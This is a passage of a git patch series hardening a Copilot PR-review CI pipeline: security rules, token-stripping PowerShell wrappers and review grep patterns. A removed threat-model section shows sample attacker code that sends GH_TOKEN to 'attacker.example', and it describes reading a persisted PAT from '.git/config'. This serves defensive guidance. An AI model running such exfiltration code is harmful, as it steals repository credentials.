PAT (post comments, labels, reviews on any PR) +- `COPILOT_GITHUB_TOKEN` — Copilot CLI install token +- AzDO GitHub service-connection PAT — repo contents, PRs, checks, workflows -A successful exfil of **any** of these = the attacker can take over PR review, post on behalf of the bot, push commits, or worse. Defending against this is non-negotiable when touching any file in this pipeline. +Exfil of any of these = account/repo takeover. Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs. ---- - -## Threat model — assume the PR is hostile - -By the time Gate runs, the PR's code has been merged into the working tree. The PR author controls: +## Rules -- every file in the merged worktree (`.csproj`, `Directory.Build.targets`, `Directory.Build.props`, `*.cs`, `*.targets`, `*.props`, `*.yml`, source generators, analyzers, test code, `eng/`, `.github/` if not specifically protected) -- everything the pipeline subsequently `dotnet build`s, `dotnet test`s, or `pwsh -File`s out of the worktree -- anything those processes can write to under `$(Build.SourcesDirectory)` (working tree) including spoofing trusted output files +1. **Per-task `env:` scoping.** Only put tokens a task needs. The Copilot-agent task gets `COPILOT_GITHUB_TOKEN` only — never `GH_TOKEN`. Pass `--secret-env-vars=GH_TOKEN,GITHUB_TOKEN,COPILOT_GITHUB_TOKEN` to the Copilot CLI. -The PR author **cannot** modify files copied to `$(Build.ArtifactStagingDirectory)/trusted-github/` **before** the PR is merged, **as long as those files are made read-only after copy**. - ---- +2. **`persistCredentials: false` on every `checkout: self`** unless the task pushes. Default checkout writes the service-connection PAT into `.git/config` as `extraheader`, readable by any subprocess. -## Rule 1 — Per-task token scoping (AzDO `env:` block) +3. **Trusted-copy scripts before merging the PR.** Setup task (still on `main`) copies `.github/scripts`, `.github/skills`, `eng/scripts` to `$(Build.ArtifactStagingDirectory)/trusted-github/`, then `chmod -R a-w`. Later tasks invoke scripts from `$TRUSTED/...`, never from the merged worktree. In PowerShell use `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (canonical impl in `Review-PR.ps1`). New post-merge scripts must be added to the Setup copy block. -Each task's `env:` block contains **only** the tokens that exact task needs. +4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). Exception: trusted scripts that only call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) keep the token. -```yaml -# ✅ correct — Task 3 (CopilotReview) gets ONLY the copilot token -- bash: | - pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... - env: - COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) - # NO GH_TOKEN here — Copilot can't post comments or push -``` +5. **Cross-phase signal files in `$(Agent.TempDirectory)`** (or `$TRUSTED`), never `$RepoRoot/...`. PR code can overwrite anything in the worktree, including a gate verdict. Readers must not silently fall back to a worktree path if the trusted one is missing. -```yaml -# ❌ wrong — leaks the comment token into the Copilot agent's env -- bash: | - pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... - env: - COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) - GH_TOKEN: $(GH_COMMENT_TOKEN) -``` +6. **Strip `##vso[...]` from PR-controlled stdout.** Pipe through `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'` — bare `sed` misses CRLF lines and the agent will execute the directive. -When invoking the Copilot CLI, also pass `--secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN` so the CLI redacts them from its own argv/log output. +7. **`gh-aw` workflows.** Pin compiler version (≥ v0.68.4 strips `pull-requests: write` per `gh-aw#28767`). Regenerate `.lock.yml` with `gh aw compile` in the **same commit** as any `.md` frontmatter edit (stale lock ⇒ all dispatches fail). `workflow_dispatch` triggers must restore trusted `.github/` from main (see `Checkout-GhAwPr.ps1`). -## Rule 2 — `persistCredentials: false` on every `checkout: self` +8. **No token republish.** Don't `setvariable` a token (visible to every later task, even with `issecret=true`). Don't write tokens to worktree files. Don't echo token names. -AzDO's default `checkout: self` writes the service-connection PAT to `.git/config` as: +## Review checklist -``` -[http "https://github.com/"] - extraheader = AUTHORIZATION: bearer -``` +- [ ] New `checkout: self` has `persistCredentials: false`. +- [ ] New `env:` block lists only the tokens that task needs; Copilot task has no `GH_TOKEN`. +- [ ] New post-merge script invoked via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir`, not `$RepoRoot/...`, AND added to Setup copy block. +- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `verify-tests-fail`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens`. +- [ ] New cross-phase state file lives under `$(Agent.TempDirectory)` / `$TRUSTED`. +- [ ] New PR-stdout pipe uses `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. +- [ ] Edited `.github/workflows/*.md` has matching `.lock.yml` regenerated in same commit. -Any subprocess on the runner — including PR-controlled code — can `cat .git/config` and exfiltrate it. **Always** add `persistCredentials: false` unless the task itself needs to push. - -```yaml -# ✅ correct -- checkout: self - persistCredentials: false - fetchDepth: 1 -``` - -```yaml -# ❌ wrong — service-connection PAT persists in .git/config for the rest of the job -- checkout: self - fetchDepth: 1 -``` - -This applies to **every** job/stage in this pipeline (the PR-review job, the deep-UI-tests job, the post-comment job, etc.), not just the one that runs the agent. - -## Rule 3 — Copy trusted scripts BEFORE the PR is merged, then make them read-only - -The Setup task does `checkout: self` of `main` (no PR merge yet) and copies known-good scripts/skills/configs to a trusted directory. Subsequent tasks must invoke those scripts **from the trusted copy**, never from the merged worktree. +## Grep these during review ```bash -# ✅ correct — in Setup task, BEFORE any `git merge` of PR code -TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" -mkdir -p "$TRUSTED" -cp -r .github/scripts "$TRUSTED/scripts" -cp -r .github/skills "$TRUSTED/skills" -cp -r eng/scripts "$TRUSTED/eng-scripts" -chmod -R a-w "$TRUSTED" # ← prevents PR code from rewriting trusted scripts at runtime -``` - -When adding a new pipeline step that invokes a `.ps1`/`.sh`/`.py` script from the repo, follow the convention in `Review-PR.ps1`: - -```powershell -# ✅ correct — resolve via the trusted dir -$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } -$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } -$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } - -& "$SkillsDir/foo/scripts/foo.ps1" ... -``` - -```powershell -# ❌ wrong — runs the PR's version of the script, with all of Gate's tokens in env -$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1" -& $detectScript -PRNumber $PRNumber -``` - -**If you add a new script** that needs to be invoked after PR merge, you must also add it to the Setup-task copy block and reference it via the corresponding `$*Dir` variable. - -## Rule 4 — Strip tokens from env before invoking PR-controlled code - -Even when the *calling* script is trusted, the *subprocess* may be PR-controlled. `dotnet build`/`dotnet test`/`dotnet run` execute the PR's MSBuild graph (`Directory.Build.targets`, `.csproj` `` blocks, source generators, analyzers, then the test/app code). Any of those can read `Environment.GetEnvironmentVariable("GH_TOKEN")` or `$(GH_TOKEN)` MSBuild property and exfiltrate via: - -```xml - - - - -``` - -```csharp -// attacker's test code -[ModuleInitializer] -public static void Leak() => HttpClient.GetAsync("attacker.example/?t=" + - Environment.GetEnvironmentVariable("GH_TOKEN")); -``` - -The same applies to invocations of `BuildAndRunHostApp.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` — all of these *internally* run `dotnet build`/`dotnet test` against PR code. - -Use the `Invoke-WithoutGhTokens` helper in `Review-PR.ps1` (or add an equivalent if writing a new orchestration script): - -```powershell -# ✅ correct — token stripped for the subprocess only, restored after -$testOutput = Invoke-WithoutGhTokens { - dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 -} -``` - -```powershell -# ❌ wrong — Gate has GH_TOKEN in env; the PR-modified .csproj inherits it -$testOutput = dotnet test $resolvedProj --filter $t.Filter ... -``` - -**Trusted metadata-fetch scripts** (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) call `gh` CLI and **need** `GH_TOKEN`. Don't wrap them. The split is: *trusted script reading PR metadata via `gh`* → keeps `GH_TOKEN`; *trusted script invoking PR-controlled code* → wraps in `Invoke-WithoutGhTokens`. - -## Rule 5 — Cross-phase signal files live outside the working tree - -The merged worktree is writable by any PR-controlled process. Anything the next phase trusts (gate verdict, sentinel files, category lists, phase-complete markers) must be written to `$(Agent.TempDirectory)` (or `$TRUSTED`), **never** to a path inside `$RepoRoot`. - -```powershell -# ✅ correct — Agent.TempDirectory is per-job, outside the worktree, not writable by PR code -$gateVerdictDir = if ($env:AGENT_TEMPDIRECTORY) { $env:AGENT_TEMPDIRECTORY } else { Join-Path $RepoRoot "CustomAgentLogsTmp/..." } -"PASS" | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -``` - -```powershell -# ❌ wrong — a malicious test in the PR can overwrite gate-result.txt with "PASS" -"PASS" | Set-Content (Join-Path $RepoRoot "CustomAgentLogsTmp/.../gate-result.txt") -``` - -The corresponding sentinel-read in a later phase MUST live at the same trusted location and MUST NOT silently fall back to the worktree path if missing. - -## Rule 6 — Strip `##vso[...]` from PR-controlled output - -`##vso[task.setvariable variable=X]value` lines in stdout are interpreted by the AzDO agent as commands to set pipeline variables. PR-controlled code (test output, build output) must have those stripped before the agent sees them, otherwise the PR can promote attacker-controlled values into pipeline variables read by subsequent tasks. - -```bash -# ✅ correct — strip CR (Windows line endings would slip past a simpler regex), then drop vso commands -"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g' -``` - -```bash -# ❌ wrong — bare sed won't match if PR output has CRLF line endings -"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | sed 's/##vso\[.*\]//g' -``` - -## Rule 7 — `gh-aw` workflows: pin version, regenerate `.lock.yml`, restore trusted `.github/` - -For files under `.github/workflows/shared/` and any `gh-aw` `.md` workflow: - -- **Pin the gh-aw compiler version.** Versions ≥ v0.68.4 strip required permissions (`pull-requests: write`) — see `gh-aw#28767`. Pin to a known-good version in the workflow frontmatter. -- **Regenerate the `.lock.yml`** with `gh aw compile` **in the same commit** as any `.md` frontmatter change. A stale lock file causes every dispatch to fail with `ERR_CONFIG: Lock file ... is outdated!`. -- **`workflow_dispatch` triggers must restore trusted `.github/` from main** (use `.github/scripts/Checkout-GhAwPr.ps1` pattern) so that a malicious PR can't supply its own workflow logic via `workflow_dispatch`. - -## Rule 8 — Don't pass tokens through pipeline variables that subsequent tasks read - -```yaml -# ❌ wrong — once written to AzDO variable store, the value is visible to every later task -- bash: echo "##vso[task.setvariable variable=MyToken;issecret=true]$(GH_TOKEN)" -``` - -Tokens come from variable groups linked at the pipeline level. Don't republish them. Don't write them to files in the worktree. Don't `echo` them — even with `issecret=true`, this widens the blast radius. - ---- - -## Code-review checklist for this surface - -When reviewing or authoring a change to any file matched by this instruction's `applyTo`, walk this list: - -- [ ] Every new/modified AzDO `checkout: self` has `persistCredentials: false` (unless the task pushes, in which case add a comment explaining why). -- [ ] Every new/modified `env:` block on a task contains **only** the tokens that task needs. The Copilot-agent task never has `GH_TOKEN`. -- [ ] Every new script invoked from the pipeline after PR merge is resolved via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (or the calling script's equivalent), not `$RepoRoot/...`. -- [ ] If a new script was added to `.github/scripts/`, `.github/skills/`, or `eng/scripts/` that needs to run post-merge, it's covered by the trusted-copy block in `ci-copilot.yml` Setup task. -- [ ] Every new invocation of `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRunHostApp.ps1`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1`, or any other process that executes PR-controlled code is wrapped in `Invoke-WithoutGhTokens { ... }`. -- [ ] Every cross-phase signal file (verdict, sentinel, intermediate state) is written to `$(Agent.TempDirectory)` / `$TRUSTED`, never to `$RepoRoot/...`. -- [ ] Any new pipeline output that includes stdout from PR-controlled code is filtered with `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. -- [ ] If a `.github/workflows/*.md` (gh-aw) was edited, the corresponding `.lock.yml` was regenerated with `gh aw compile` in the same commit. -- [ ] Token names are never written to log lines, even with `Write-Host`/`echo`. Token *values* are never written to files in the worktree. - -## Anti-patterns to grep for during review - -```bash -# Token leak to PR-controlled subprocess -git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts/ .github/skills/ | grep -v Invoke-WithoutGhTokens - -# Script invoked from PR worktree instead of trusted copy -git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts/ .github/skills/ - -# Missing persistCredentials +git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts .github/skills | grep -v Invoke-WithoutGhTokens +git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts .github/skills git grep -nA1 'checkout: self' eng/pipelines/ci-copilot.yml | grep -v persistCredentials - -# Cross-phase state in worktree -git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts/ .github/skills/ - -# Bare ##vso strip without CR handling -git grep -nE "sed.*##vso" eng/pipelines/ci-copilot.yml | grep -v "tr -d" +git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts .github/skills +git grep -nE 'sed.*##vso' eng/pipelines/ci-copilot.yml | grep -v 'tr -d' ``` - ---- - -## References - -- **PR #35324** — refactor that introduced the 4-task split and surfaced these issues -- **MauiBot 2026-05-24 review** of PR #35324 — flagged Rules 3 and 4 violations -- **PR #35376** — earlier change that re-introduced missing `persistCredentials: false` on cross-stage checkouts -- **`Review-PR.ps1`** — canonical implementation of `$ScriptsDir`/`$SkillsDir`/`$EngScriptsDir` resolution and `Invoke-WithoutGhTokens` helper -- **`ci-copilot.yml` Setup task** — canonical trusted-copy + `chmod -R a-w` pattern From 7ade47d22efad51cbeb2bff8cb19a53a32c2c4f5 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 11:47:28 +0200 Subject: [PATCH 11/34] [CI] Use YAML list + brace alternation for applyTo Switch from a 12-entry comma-separated string to a 6-entry YAML list, matching the format the majority of .github/instructions files already use. Uses minimatch brace expansion ({pr-review,verify-tests-fail-...}) and extension wildcards (workflows/*.{md,yml,lock.yml}) to drop 6 hardcoded paths. Validated to match 70 files across the surface (ci-copilot.yml + 41 scripts + 19 skill files + 4 phase docs + 4 workflows + 1 detector). Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../ci-copilot-pipeline-security.instructions.md | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index d98cf17fab22..8768df114d82 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -1,6 +1,12 @@ --- description: "Security rules for the Copilot PR-review pipeline. Read before editing." -applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" +applyTo: + - "eng/pipelines/ci-copilot.yml" + - "eng/scripts/detect-ui-test-categories.ps1" + - ".github/scripts/**" + - ".github/pr-review/**" + - ".github/skills/{pr-review,verify-tests-fail-without-fix,try-fix,run-device-tests}/**" + - ".github/workflows/{review-trigger,pr-review-queue,copilot-evaluate-tests}.*" --- # CI Copilot pipeline — security rules From 0e3ce9d8e63072fdf9911814228f769fd67bd71e Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 13:11:17 +0200 Subject: [PATCH 12/34] [CI] Use officially-documented applyTo syntax + drop scare line Two changes: 1. Drop the "account/repo takeover" framing from the intro -- the threat-model bullets already list what each token grants; leave the consequences implicit. 2. Switch applyTo from YAML list + brace expansion to the single comma-separated string format documented by GitHub: https://docs.github.com/en/copilot/how-tos/configure-custom-instructions/add-repository-instructions The official docs explicitly support multiple patterns via a comma-separated string (example: applyTo: "**/*.ts,**/*.tsx"). YAML list form and {a,b,c} brace expansion are NOT documented. The web-side parser (Copilot coding agent + code review on github.com) splits on commas first, which would shatter any brace expression into garbage globs. Comma-separated string works in VS Code Copilot, Copilot CLI, and on github.com. Kept the .* extension wildcard for copilot-evaluate-tests.* (standard glob, covers .md + .lock.yml). Validated 70 files matched across 11 patterns with brace expansion disabled. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .../ci-copilot-pipeline-security.instructions.md | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index 8768df114d82..ce3e29f667a4 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -1,12 +1,6 @@ --- description: "Security rules for the Copilot PR-review pipeline. Read before editing." -applyTo: - - "eng/pipelines/ci-copilot.yml" - - "eng/scripts/detect-ui-test-categories.ps1" - - ".github/scripts/**" - - ".github/pr-review/**" - - ".github/skills/{pr-review,verify-tests-fail-without-fix,try-fix,run-device-tests}/**" - - ".github/workflows/{review-trigger,pr-review-queue,copilot-evaluate-tests}.*" +applyTo: "eng/pipelines/ci-copilot.yml,eng/scripts/detect-ui-test-categories.ps1,.github/scripts/**,.github/pr-review/**,.github/skills/pr-review/**,.github/skills/verify-tests-fail-without-fix/**,.github/skills/try-fix/**,.github/skills/run-device-tests/**,.github/workflows/review-trigger.yml,.github/workflows/pr-review-queue.yml,.github/workflows/copilot-evaluate-tests.*" --- # CI Copilot pipeline — security rules @@ -17,7 +11,7 @@ This pipeline runs **untrusted PR code** on AzDO agents with these tokens in sco - `COPILOT_GITHUB_TOKEN` — Copilot CLI install token - AzDO GitHub service-connection PAT — repo contents, PRs, checks, workflows -Exfil of any of these = account/repo takeover. Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs. +Once the PR is merged into the worktree, the author controls every `.csproj`, `Directory.Build.targets`, source generator, analyzer, test, `.ps1`, and `.yml` the pipeline subsequently runs. ## Rules From 888febc9e980ebcb5793ae64a685ce5fc2d55c94 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 20:20:01 +0200 Subject: [PATCH 13/34] [CI] Fix Gate: move token-strip wrap inside verify-tests-fail.ps1 The previous commit wrapped the WHOLE verify-tests-fail.ps1 invocation in Invoke-WithoutGhTokens at the Review-PR.ps1 level. That broke the Gate because verify-tests-fail.ps1 itself needs GH_TOKEN to call Detect-TestsInDiff.ps1, which uses `gh api repos/.../pulls/N/files` to enumerate PR files for test-type detection. Right design: wrap as close to the PR-controlled subprocess as possible, NOT at the outer trusted-script boundary. A trusted script may need `gh` itself for metadata. Changes: - verify-tests-fail.ps1: add Invoke-WithoutGhTokens helper, wrap the 4 PR-code subprocess sites inside Invoke-TestRun (UI BuildAndRun, XAML dotnet test, Unit dotnet test, Device Run-DeviceTests). - Review-PR.ps1: unwrap the outer pwsh -File $verifyScript call. Add comment explaining why this one is intentionally not wrapped. - ci-copilot-pipeline-security.instructions.md Rule 4: clarify "wrap as close to the subprocess as possible, not at the outer trusted-script boundary"; drop verify-tests-fail.ps1 from the list of scripts to wrap (it wraps its own internal calls now); update review checklist to say "AT THE CALL SITE". Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...-copilot-pipeline-security.instructions.md | 4 +-- .github/scripts/Review-PR.ps1 | 6 +++- .../scripts/verify-tests-fail.ps1 | 30 ++++++++++++++++--- 3 files changed, 33 insertions(+), 7 deletions(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index ce3e29f667a4..b77f09904152 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -21,7 +21,7 @@ Once the PR is merged into the worktree, the author controls every `.csproj`, `D 3. **Trusted-copy scripts before merging the PR.** Setup task (still on `main`) copies `.github/scripts`, `.github/skills`, `eng/scripts` to `$(Build.ArtifactStagingDirectory)/trusted-github/`, then `chmod -R a-w`. Later tasks invoke scripts from `$TRUSTED/...`, never from the merged worktree. In PowerShell use `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (canonical impl in `Review-PR.ps1`). New post-merge scripts must be added to the Setup copy block. -4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). Exception: trusted scripts that only call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) keep the token. +4. **Strip tokens before invoking PR-controlled code.** Wrap every `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `Invoke-UITestWithRetry.ps1` in `Invoke-WithoutGhTokens { ... }` (defined in `Review-PR.ps1` and `verify-tests-fail.ps1` — saves/clears/restores `GH_TOKEN`, `GITHUB_TOKEN`, `COPILOT_GITHUB_TOKEN`). **Wrap as close to the subprocess as possible, not at the outer trusted-script boundary** — a trusted script may itself need `gh` for metadata (e.g., `verify-tests-fail.ps1` calls `Detect-TestsInDiff.ps1` which uses `gh api`), so wrapping the whole script breaks its detection path. Wrap only the line that launches the PR-controlled process. Exception: scripts that ONLY call `gh` for PR metadata (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) don't need wrapping at all — they keep the token. 5. **Cross-phase signal files in `$(Agent.TempDirectory)`** (or `$TRUSTED`), never `$RepoRoot/...`. PR code can overwrite anything in the worktree, including a gate verdict. Readers must not silently fall back to a worktree path if the trusted one is missing. @@ -36,7 +36,7 @@ Once the PR is merged into the worktree, the author controls every `.csproj`, `D - [ ] New `checkout: self` has `persistCredentials: false`. - [ ] New `env:` block lists only the tokens that task needs; Copilot task has no `GH_TOKEN`. - [ ] New post-merge script invoked via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir`, not `$RepoRoot/...`, AND added to Setup copy block. -- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `verify-tests-fail`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens`. +- [ ] New invocation of PR-controlled code (`dotnet test|build|run`, `BuildAndRun*`, `Run-DeviceTests`, `Invoke-UITestWithRetry`) is wrapped in `Invoke-WithoutGhTokens` AT THE CALL SITE (not at an outer boundary). - [ ] New cross-phase state file lives under `$(Agent.TempDirectory)` / `$TRUSTED`. - [ ] New PR-stdout pipe uses `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. - [ ] Edited `.github/workflows/*.md` has matching `.lock.yml` regenerated in same commit. diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 432fdc2219e4..cb39a45faf59 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -1509,7 +1509,11 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) { # PR like a regression repro), it falls back to "verify failure only" mode # and reports whether the new tests fail without any fix. Passing the flag # would force the script to error out for those PRs. - $gateOutput = Invoke-WithoutGhTokens { & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 } + # Note: NOT wrapped in Invoke-WithoutGhTokens here — verify-tests-fail.ps1 + # itself needs GH_TOKEN to invoke Detect-TestsInDiff.ps1 (which calls `gh api` + # to enumerate PR files). The script wraps its OWN dotnet/host-app/device-test + # subprocess invocations internally to strip the token before PR code runs. + $gateOutput = & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 $gateExitCode = $LASTEXITCODE $gateOutput | ForEach-Object { Write-Host " $_" } diff --git a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 index c623c8a8860f..e54d900a1cf1 100644 --- a/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 +++ b/.github/skills/verify-tests-fail-without-fix/scripts/verify-tests-fail.ps1 @@ -104,6 +104,28 @@ if ($Platform -eq "maccatalyst") { $Platform = "catalyst" } +# ============================================================ +# Strip GH/Copilot tokens from environment for the duration of a +# scriptblock that invokes PR-controlled code (dotnet test, MSBuild, +# host-app, device tests). Trusted metadata fetches via `gh` CLI +# (Detect-TestsInDiff, gh pr view) keep the token because they run +# OUTSIDE this wrapper. See .github/instructions/ci-copilot-pipeline-security.instructions.md. +# ============================================================ +function Invoke-WithoutGhTokens { + param([Parameter(Mandatory)][scriptblock]$ScriptBlock) + $saved = @{} + foreach ($n in @('GH_TOKEN','GITHUB_TOKEN','COPILOT_GITHUB_TOKEN')) { + $saved[$n] = [Environment]::GetEnvironmentVariable($n) + [Environment]::SetEnvironmentVariable($n, $null) + } + try { & $ScriptBlock } + finally { + foreach ($n in $saved.Keys) { + [Environment]::SetEnvironmentVariable($n, $saved[$n]) + } + } +} + # Platform is required for UI and device tests, optional for unit/XAML tests if ($TestType -in @("UITest", "DeviceTest") -and -not $Platform) { throw "$TestType requires -Platform parameter (android, ios, catalyst, windows)." @@ -354,7 +376,7 @@ function Invoke-TestRun { $uiParams.DeviceUdid = $script:BootedDeviceUdid } # Capture all output — includes build, deploy, and test results - $scriptOutput = & $buildScript @uiParams 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & $buildScript @uiParams 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } @@ -379,7 +401,7 @@ function Invoke-TestRun { $testArgs += @("--filter", $Filter) } - $scriptOutput = & dotnet @testArgs 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & dotnet @testArgs 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } @@ -417,7 +439,7 @@ function Invoke-TestRun { $testArgs += @("--filter", $Filter) } - $scriptOutput = & dotnet @testArgs 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & dotnet @testArgs 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } @@ -459,7 +481,7 @@ function Invoke-TestRun { $deviceParams.DeviceUdid = $script:BootedDeviceUdid } - $scriptOutput = & $deviceTestScript @deviceParams 2>&1 + $scriptOutput = Invoke-WithoutGhTokens { & $deviceTestScript @deviceParams 2>&1 } $scriptOutput | Out-File -FilePath $LogFile -Force -Encoding utf8 return $LogFile } From d8ff0a1dc49ef6a58e29a22e500685a2ee18daea Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Wed, 27 May 2026 11:07:47 +0200 Subject: [PATCH 14/34] Fix AI summary session replacement Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/post-ai-summary-comment.ps1 | 81 ++------------------- 1 file changed, 5 insertions(+), 76 deletions(-) diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 26d25a082058..5648709851a6 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -6,11 +6,8 @@ .DESCRIPTION Maintains ONE comment per PR, identified by marker. Before posting a fresh comment, any older generated AI Summary comments are - removed. Existing session blocks are preserved in the newly posted comment. - Each review run adds an expandable session keyed by HEAD commit SHA. - - Same commit SHA → replaces that session in the newly posted comment. - - New commit SHA → prepends a new session (latest first). - Older sessions stay collapsed; the newest is expanded by default. + removed. The replacement comment contains only the latest review session, + keyed by the current HEAD commit SHA. After posting, the PR author is @-mentioned so they know to review. @@ -196,63 +193,13 @@ $phaseContent $sessionMarkerEnd "@ -# ============================================================================ -# MERGE WITH EXISTING SESSIONS -# ============================================================================ - -function Merge-Sessions { - param( - [string]$ExistingBody, - [string]$NewSession, - [string]$CommitSha7 - ) - - # Extract all session blocks from existing body - $sessionPattern = '(?s).*?' - $existingSessions = [regex]::Matches($ExistingBody, $sessionPattern) - - $sessions = [ordered]@{} - foreach ($match in $existingSessions) { 